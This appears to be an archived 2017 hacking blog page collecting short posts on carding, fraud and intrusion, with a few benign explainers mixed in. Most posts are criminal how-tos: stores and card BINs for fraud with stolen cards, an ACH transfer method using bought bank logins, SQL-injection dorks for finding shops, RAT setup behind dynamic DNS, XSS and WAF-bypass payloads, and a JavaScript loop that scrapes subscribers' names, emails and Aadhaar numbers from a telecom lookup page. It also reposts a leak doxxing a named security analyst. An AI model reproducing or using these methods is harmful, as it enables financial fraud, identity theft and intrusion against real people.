Skip to main content

Posts

Showing posts from July, 2017

How Hacker can Hack highly Secure Company

PASTEBIN new paste trends   Mandiant Leak: Op. #LeakTheAnalyst  A GUEST   JUL 31ST, 2017   18,655  NEVER Not a member of Pastebin yet?   Sign Up , it unlocks many cool features! raw download report 3.86 KB -=--=--=- Section #1: Mandiant and Adi Peretz Leaks Part #1 -=--=--=- It was fun to be inside a giant company named “Mandiant” we enjoyed watching how they try to protect their clients and how their dumb analysts are trying to reverse engineer malwares and stuffs. Now that “Mandiant” knows how deep we breached into its infrastructure its so-called threat analysts are trying to block us. Let's see how successful they are going to be :D   Mandiant Internal Leaks: Target: Mandiant, FireEye, High Profile Personels Initial Access: 2016 Final Access: 2017   Victim #1 Profile: --- Name: Adi Peretz --- Op. Nickname: Mr. Muscle AKA FatFuck --- Position: Senior Threat Intelligence Analyst at Mandiant --- Layer #1 Targets: Chrome, Firefox, Windows (What kind of a dumb

some sides

Educational purposes Carding Site Leveloflevels: ALL ITEMS FOR 20 $ All stores must be tried with state rdp or state sock...proxy score must be clear Apple Normal placement (calling ) or u can do it online but I recommend calling OR U can ship to bill whe preparing to ship call to change to drop   Tigerdirect.com Cc name on both billing and shipping Ship to drop Same state cc LLBEAN.COM SAME STATE SHIPMENT  LANDSEND.COM SAME STATE SHIPMENT  Threadless.com Any good cc Normal placing Cc name on both shipping n billing                        Thingsremembered.com SAME STATE CC ....               Mmgselfmade.com   clothing Same state cc or any good cc Normal placement Cc name on both shipping n billing add    NBASTORE.COM   clothing SAME STATE CARD . NEXT BUSINESS DAY SHIPMENT BILL NAME FOR ALL. STATE PHONE NUMBER.      THERE ARE SOME STORES THAT KILL CARD....          Hanes.com      clothing Same state cc Normal placement                          So

Ransomware Prevention Tool

Pwn2Rule Info Club: Ransomware Prevention Tool IN THE LAST few months, waves of ransomware attacks have pummeled the world, disrupting not just businesses but also vital services like hospital care, energy infrastructure, and telecoms. Which means the research Andrea Continella and his team have pursued recently couldn't be better timed: *A tool that detects ransomware automatically, almost instantly, and restores your system from backups before hackers can fully lock it down* Called *ShieldFS*, the team's innovation isn't a broad antivirus platform, but that's by design. Instead, it's a targeted feature that scans only for ransomware attacks. By keeping the scope narrow, the project could focus on identifying the unique cryptographic behaviors of ransomware, which enables ShieldFS to detect not only known types, but also any new attacks that act in a ransomware-like manner. The group, based out of the Politecnico di Milano in Italy, will present ShieldFS a

Google Dorks(dont use)

Carding Dorks Leveloflevels: fresh dorks intitle:"clothing".php?id= title:login intitle:"grooming".php?id= title:login intitle:"Bags".php?id= title:login inurlroduct.php?cat= title:login inurl:client.php?id= title:login inurl:article.php?page_id= titleaypal inurl:category.php?id= title:login page:2015 inurl:viewItem.php?id= title:login inurl:viewArticles.php?id= title:login inurl:job.php?id= title:login inurleople.php?id= title:login inurlhp?id= site:fr title:buy inurl:Art.php?id= title:login inurl:collection.php?id= title:login inurl:song.php?id= title:login inurllay.php?id= titleaypal inurl:staticpage.php?id= intextaypal inurl:showinfo.php?id= titleaypal inurl:library.php?id= title:login inurl:interior.php?id= title:login inurl:view.php?id= title:login inurl:release.php?id= title:login inurlodcast.php?id= title:login inurl:news-event.php?id= title:login inurl:articles.php?id= title:login page:2015 inurl:view.php?id= t

ACH Transfer(How Niggas Grown up(

Only Education purposes I am Lit: ACH teaching. After reading through the rules and tools you need on the first post I made about enlightening ourselves on ACH/Transfer, you are now good to run a successful job by following this laid down process. 1, Put on your laptop and set up your RDP using Mozilla Firefox, I prefer Mozilla Firefox because it's what I've been using now for the past 5years without any error or problem. NOTE that RDP is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software. It will connect you with any computer that is located in other country. We use it to stay anonymous and safety. In one word you will use someone’s pc to run ACH instead of your own. 2, Enter the bank website of the log that you bought, for instant you bought Wells Fargo login, y

Imp site(Dont try only for education)

I am Lit: http://www.jdsports(dot)com Method: Bill & Ship SAME Use: VPN or Sock5 Shipping:Worldwide Clothing : Web: https://www.tmlewin(dot)co(dot)uk Method: Bill+ship same / Clear coockie / Usa cc tested Worldwide Electronic : Web: http://www.tomtop(dot)com Method: Bill+Ship same / Clear Coockie / With usa cc tested Ship: WorldWide Clothing: VBV Web: https://www.oki-ni(dot)com/ Method: Ship+Bill Same / Tested with europe cc Ship: WorldWide Sport Earphones: Web: https://yurbuds(dot)com/ Method: Ship+Bill same / WorldWide cc Ship: WorldWide Controler for xbox and playstation: Web: squidgrip(dot)com Method: Ship+Bill same / Usa cc tested. Ship: WorldWide Clothing: Web: https://www.and-japan(dot)com Method: Ship+Bill Same / Usa cc tested Ship: WorldWide Computer Acesoriess: Web: https://store.hermanstreet(dot)com/ Method: Use rdp/socks or vpn same country with cc , bill cc / ship your address. Ship: WorldWide Clothing: Web: http://store.wizkhalifa(dot

Free Recharge(Dont try)

Only Education purposes I am Lit: How to recharge any mobile number online 🔈 Ezetop full tut about stuff: you need CC and Socks AU CC non vbv or vbv with pass and Socks like State Here is bins you want to use it to get success!: 454818 - 494052 - 456448 - 443431 - 443451 - 468524 409349 - 493414 - 443420 - 552638 - 455702 - 456442 456487 - 450605 - 443458 - 421699 - 456443 - 521729 443462 - 443440 - 516329 - 456430 - 443446 - 443438 518840 - 494053 - 456471 - 456462 - 426534 - 423953 now your stuff is ready login to socks an go to ezetop.com and choose the country do you want to topup and put the number and click recharge you need to try for low amount first and use non vbv it's only bins will make you success! and you must use non vbv card or vbv with pass with this method you will card any country you want Goodluck

Hacking Bank account(Dream)

I am Lit: HACKING TUTORIALS Most people learning hacking always have a keen interest in knowing that how they can hack bank accounts of other people. But most of them find it pity much difficult such that now they have made a perception that bank account information like credit cards or debit cards or net banking passwords cannot be hacked. Its truth to an extent that hacking Banking account information and credit or debit cards passwords is most difficult and almost impossible part. Today i will discuss with you why hacking bank account information is tough and always considered as impossible task. We will also discuss the different methods that hackers use to hack bank account information nowadays. I am quite sure that almost everybody using internet nowadays uses that internet to pay online bills, book reservation tickets, purchase online things or simply transfer money i.e. involved in at least some kind of online transaction that is related to money i.e. banking information, cr

penetesting course

penetesting course Pentester Academy https://mega.nz/#F!phlTVYbS!OO9UD1i83tpRaulB_q3qrQ If Anyone Need Individual Download Link...!!!!!!! Here You Go...!!!!!!! http://rapidgator.net/file/0f34cf2972794ad84c6c2aaaaff6ee88/pentesterAcademy.part01.rar.html http://rapidgator.net/file/23df3a36a267d882835617f3f05c33bb/pentesterAcademy.part02.rar.html http://rapidgator.net/file/23315fc6f821ef3563668f95e6fe9707/pentesterAcademy.part03.rar.html http://rapidgator.net/file/9234298e84cfd58e58b10dd4ae7dd3d1/pentesterAcademy.part04.rar.html http://rapidgator.net/file/d6e0f8b7e1110dda3925c3abf164df0b/pentesterAcademy.part05.rar.html http://rapidgator.net/file/cef039de23f8c1141342b3a1c5443086/pentesterAcademy.part06.rar.html http://rapidgator.net/file/242473441ace4b87ac12859c0d10fe65/pentesterAcademy.part07.rar.html http://rapidgator.net/file/4d91768633bcc6ebfd755a5329fd5dac/pentesterAcademy.part08.rar.html http://rapidgator.net/file/38c7b0688f2de3be16c61a9d7c342d2f/pentesterAcademy.part09

How Bitcoin transactions work

Skip to content Sirus Shahini How Bitcoin transactions work July 16, 2017   Cyrus.Sh Cryptograhpy Introduced in 2009, bitcoin appeared as the most remarkable digital cryptocurrecy. The theory behind bitcoin is to how to send some amount of money to someone directly without the need for any intermediary and in a secure manner which both guarantees the integrity of the payment data and its authorization. Unfortunately the official documents are difficult for many people and developers who are not familiar with the concept. In this post, with a simple literature I tried to clarify bitcoin transactions as simple as possible. It is expected the reader would assimilate the exact idea behind bitcoin transactions and authorization system after reading the post thoroughly . So please read till the end of if you are interested. Bitcoin transactions use a peer-to-peer system to transfer digital coins. It may be interesting to know there is actually not any records of the coins stored anywher

Free Socks for Live Safe yourself

I am Lit: FREE SOCK SITE LIST http://www.samair.ru/proxy/ http://www.proxy4free.com/page1.html http://www.stayinvisible.com/ http://www.proxz.com/ http://www.my-proxy.com/ http://www.publicproxyservers.com/ http://proxy.org/ http://www.xroxy.com/ http://www.samair.ru/proxy/fresh-proxy-list.htm http://atomintersoft.com/products/al...xy/proxy-list/ http://www.proxy-list.net/ http://www.samair.ru/proxy/type-01.htm http://www.publicproxyservers.com/page1.html http://www.greatproxylist.com/ http://www.freeproxylists.com/ http://www.proxy-list.org/ http://www.digitalcybersoft.com/ http://www.proxyblind.org/ http://www.freeproxysite.com/ http://www.tech-faq.com/proxy.shtml http://www.azproxies.com/ http://www.samair.ru/proxy/proxy-01.htm http://www.fresh-proxy-list.net/ http://www.freshproxy.org/ http://proxylist.sakura.ne.jp/ http://www.proxybeat.com/ http://www.samair.ru/ http://www.hidemyass.com/proxy-list/ http://www.multiproxy.org/anon_proxy.htm http://www.

Boost up Your Hacking Career(Must See)

EnigmaGroup http://www.enigmagroup.org/ Exploit Exercises http://exploit-exercises.com/ Google Gruyere http://google-gruyere.appspot.com/ Gh0st Lab http://www.gh0st.net/ Hack This Site http://www.hackthissite.org/ HackThis http://www.hackthis.co.uk/ HackQuest http://www.hackquest.com/ Hack.me https://hack.me Hacking-Lab https://www.hacking-lab.com Hacker Challenge http://www.dareyourmind.net/ Hacker Test http://www.hackertest.net/ hACME Game http://www.hacmegame.org/ Hax.Tor http://hax.tor.hu/ OverTheWire http://www.overthewire.org/wargames/ pwn0 https://pwn0.com/home.php RootContest http://rootcontest.com/ Root Me http://www.root-me.org/?lang=en Security Treasure Hunt http://www.securitytreasurehunt.com/ Smash The Stack http://www.smashthestack.org/ TheBlackSheep and Erik http://www.bright-shadows.net/ ThisIsLegal http://thisislegal.com/ Try2Hack http://www.try2hack.nl/ WabLab http://www.wablab.com/hackme XSS: Can You XSS This? http://can

Setup RAT without your real ip and router

proXPN is a free VPN program. Basically, for the noobs, this is like putting your computer behind a good proxy. When you connect, your IP appears to be one of proXPN’s. The upside to using proXPN is that in a way, your NAT is bypassed, and you pretty much have a public IP (meaning no need to route ports through a router). No-IP is a free DNS host site. You register, give the site an IP of yours, and they give you a DNS host that routes to that IP. So lets say you make a “imanoob.no-ip.info” dns, routed to your IP, then anything that goes to that address goes to your IP. It’s like how when you go to “www.google.com”, you’re ACTUALLY going to “74.125.224.49”. The name google.com is just something for humans, but when you enter that, it gets sent to a DNS server, looks up the IP, then goes to the IP so you can see  http://www.google.com . (I’m making these explanations vague for sake of noobs to compensate, don’t jump my shit.)   Now, after you’ve registered, here’s the magic. Login a

Cobalt Strike(peneteser Tool)

Download Now Features Screenshots Training Support Advanced Threat Tactics  ( Notes and References ) is a free course on red team operations and adversary simulations. This course will provide the background and skills necessary to emulate an advanced threat actor with Cobalt Strike. 1. Operations This course starts with an overview of the Cobalt Strike project, team server setup, and a deep dive into Cobalt Strike's model for long-term distributed operations. Logging and Reporting are covered as well. 2. Infrastructure This lecture covers listener manager and how to configure the various Beacon flavors. Ample time is devoted to cloud-based redirectors, DNS Beacon setup, and infrastructure troubleshooting. This lecture concludes with a discussion on payload security. 3. Targeted Attacks Learn how to get a foothold in a modern enterprise with a targeted spear phishing attack. This lecture covers client-side reconnaissance, user-driven attacks, delivering Beacon with exploit

Phising kit hunter

Noob Guy ®: Find phishing kits which use your brand/organization's files and image.PhishingKitHunter (or PKHunter) is a tool made for identifying phishing kits URLs used in phishing campains targeting your customers and using some of your own website files (as CSS, JS, ...).  This tool - write in Python 3 - is based on the analysis of referer's URL which GET particular files on the legitimate website (as some style content) or redirect user after the phishing session. Log files (should) contains the referer URL where the user come from and where the phishing kit is deployed.  PhishingKitHunter parse your logs file to identify particular and non-legitimate referers trying to get legitimate pages based on regular expressions you put into PhishingKitHunter's config file. Features find URL where a phishing kit is deployedfind if the phishing kit is still up and runninggenerate a JSON report usefull for external usageuse a hash of the phishing kit's page to identify the k

Courses Of Hacking By penetester Academy

Noob Guy ®: [pentester academy] all courses download --------------------------------------- Web Application Pentesting link course :- www.pentesteracademy.com/course?id=5 download torrent (4.92 GB ) : http://rutracker.net/forum/viewtopic.php?t=5143366 ----------------------------------------- Javascript for Pentesters link course :- www.pentesteracademy.com/course?id=11 download torrent (1.32 GB ) : http://rutracker.net/forum/viewtopic.php?t=5149570 or 1- http://dl.git.ir/1394/7-07/Pentester%20Academy%20Javascript%20for%20Pentesters_git.ir.part1.rar 2- http://dl.git.ir/1394/7-07/Pentester%20Academy%20Javascript%20for%20Pentesters_git.ir.part2.rar code : 9997 ----------------------------------------- Web Application Pentesting + Javascript for Pentesters in one link http://adf.ly/1j79xh ----------------------------------------- WAP Challenges Course Videos course link : http://www.pentesteracademy.com/course?id=8 download :- http://dl.git.ir/1394/7-07/Pentester%20A

Jio Leaks

var dd = ""; for(i=0;i<1000;i++) { var x = ("00"+i).slice(-3) var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { var rex = /(<([^>]+)>)/ig; var xss = this.responseText.replace(rex , ""); if(xss.trim() != "First Name:-MiddleName:-Last Name:-mobileNumber:-Email-Id:-circle-Id:-SIM Activation Date and Time:-aadhaarNumber:-") { dd += this.responseText.replace(rex , ""); dd += "\r\n--------------------------\n" } } }; xhttp.open("GET", "http://www.magicapk.com/jiosimdetail.php?Mobile=8076916"+x, true); xhttp.send(); }

Digital Forensic File/lab setup

JuanDeLemos: •  Hotels or during travel (boot from flash drive or DVD). •  School labs (boot from flash drive or DVD). •  Any computer that has DVD ROM or USB port and allows to boot from them. Notes: •  Kodachi can be permanently installed on your PC but we do not recommend that as it will save all your settings on the hard drive which defeats the main purpose of being an anti forensic system to know more about forensic please click here. Unless you intend to use Kodachi daily as your main operating system. •  Kodachi is a Debian-based live DVD/USB operating system which means that all packages are based on pure Debian repository. Kodachi has been customized and tweaked using plain text bash scripts which are included with the ISO package. •  Kodachi is totally free and in order to maintain the monthly cost of our VPN servers we utilize small portion of CPU resources (less than 1%) for LTC on any computer that runs Kodachi. For people who would like to donate to the project

Some XSS payloads

JuanDeLemos: Some XSS payload starts  <!'/*!"/*!//'/*//"/*--!> or >');'>%>?>">">\x22\x3e/*-->]]> <!'/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/Onfocus=confirm`1`//><Svg> Fuck WAF <script>a=xss<!--<script/\;</script><input value="${alert(1)}`</script/"> Fuck WAF with string obfuscation <script>eval(ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(666));</script/"> XSS in href link <a href="" onclick=``/name==alert(1)>clickme1</a> or <a href="" onclick=``/*/alt="*//alert(1)//">clickme2</a> Rewrite page <a href="javascript:document.write('c========3'); void(0);">Middle-click me</a> New test   '\"--!><Body /Onpageshow=confirm`1`> "-->'><script>alert(1);</script>" List of different XSS Cheat

Defence Hackibg Course in ESPANOL(use translator)

JuanDeLemos: Técnicas Básicas y Avanzadas de Ataque y Defensa Hacking (2016) [Español]    Curso teórico práctico que busca brindar a un oficial de Seguridad de la Información o administrador de red la habilidad para implementar tecnologías avanzadas de seguridad para la protección de la infraestructura tecnológica de su empresa. Se conocerán técnicas y herramientas enfocadas a distintos tipos de sistemas operativos y aplicaciones. El curso inicia identificando la forma de operación de un intruso, sus tácticas, desde las más comunes y sencillas, hasta aquellas técnicas y estrategias de ataque más elaboradas, posteriormente se aprenderán los mecanismos de defensa. —---------------------------------------------------------------------------------------— Descarga: Parte1 https://mega.nz/#!5QRkkCyb!PiQT2Q-zpVA8eSn8k0Y6UjQkONrbAVOyUUMGPqWXLCU Parte2 https://mega.nz/#!dMIXwIaY!vWB_DTAdi3_qxvkWTXSzHVgmgbcrU4fKHwsKRhXLPmE Parte3 https://mega.nz/#!IUIU0RBT!yOalsVLCo33RU-2IwEa1znl0uStH

OWASP TOP10 Vulne. video

JuanDeLemos : TOP 10 VULNERABILIDADES OWASP.   —---------------------------------------------------------------------------------------— Si eres de los que ha buscado una “base” para estudiar, o quisieras saber cuales son los métodos de hacking más usados, este curso es para ti. Aquí podrás ver y aprender con ataques en directo sobre las técnicas de hacking más usadas. OWASP, es una de las fundaciones pioneras en cuanto a temas de investigación de seguridad. —---------------------------------------------------------------------------------------— TOP 10 OWASP: 1 - Introducción y Explicación sobre Owasp 2 - Inyección 3 - Perdida de autenticación y administración de Sesiones 4 - XSS 5 - Referencia Directa Insegura a Objetos 6 - Configuración de Seguridad Incorrecta 7 - Exposición de datos sensibles 8 - Inexistente Control de Acceso a Nivel de Funcionalidades 9 - Falsificación de Peticiones en Sitios Crusados CSRF 10- Uso de Componentes con Vulnerabilidades Web Con

Various Forums

JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali   http://www.kali.org/  http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails  http://distrowatch.com/tails  https://tails.boum.org/  https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace. 3. Alpine Linux   http://